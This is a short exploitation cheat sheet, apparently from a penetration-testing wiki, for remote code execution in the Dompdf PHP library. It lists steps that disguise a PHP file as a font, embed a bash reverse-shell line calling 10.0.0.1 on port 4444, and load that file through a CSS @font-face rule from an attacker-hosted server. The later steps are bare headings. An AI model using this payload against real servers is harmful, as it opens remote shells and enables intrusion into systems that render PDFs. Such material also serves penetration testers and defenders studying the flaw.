Dompdf RCE
Exploitation
1. Create Malicious Font
find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>2. Create Malicious CSS
@font-face {
font-family: 'evil';
src: url('http://10.0.0.1:8000/evil.php');
font-weight: 'normal';
font-style: 'normal';
}3. Host PHP & CSS
4. Send Request
5. Execute Malicious PHP via Cached File
Exploitation (Automatically)
References
Last updated